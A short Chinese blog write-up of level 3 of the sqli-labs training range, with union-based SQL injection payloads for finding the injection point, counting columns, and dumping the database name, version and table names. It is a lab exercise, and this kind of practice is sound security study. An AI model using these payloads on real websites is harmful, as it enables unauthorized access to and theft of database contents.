web——sqliabs靶场——第三关

今天来搞搞第三关,感觉和之前差不多,就多了一个奇怪的知识

来看看有没有注入点

/?id=1'

有注入点

判断注入点类型

输入/?id=1') and 1=2 --+

3.判断它的字段数

/?id=1') order by 1-++

/?id=1') order by 2-++

/?id=1') order by 3-++

/?id=1') order by 4-++

爆出显示位

/?id=-1') union select 1,2,3 --+

开始判断库名

?id=-1') union select 1,database(),version() --+

判断表名

/?id=-1') union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' --+

判断user的列名

爆具体的列里的数据

相关推荐
DKPT5 分钟前
正则表达式
java·数据库·笔记·学习·正则表达式
CodeJourney.7 分钟前
DeepSeek与WPS的动态数据可视化图表构建
数据库·人工智能·信息可视化
背着黄油面包的猫21 分钟前
速通FlinkCDC3.0
数据库·mysql·flink
星迹日28 分钟前
MySQL:数据库设计
数据库·mysql
听闻风很好吃44 分钟前
Redis高级数据类型解析(二)——Set、Sorted Set与Geo实战指南
数据库·redis·缓存
小刘同学++44 分钟前
Qt 使用 MySQL 数据库的基本方法
数据库·qt·mysql
编程在手天下我有1 小时前
缓存与数据库数据一致性:旁路缓存、读写穿透和异步写入模式解析
数据库·缓存·oracle·软件开发·架构设计·数据一致性
云攀登者-望正茂1 小时前
Redis 及其在系统设计中的作用
数据库·redis·缓存
博睿谷IT99_1 小时前
PostgreSQL性能优化实用技巧‌
数据库·postgresql·性能优化
Leo.yuan2 小时前
数据仓库是什么?数据仓库架构有哪些?
大数据·数据库·数据仓库·架构·数据分析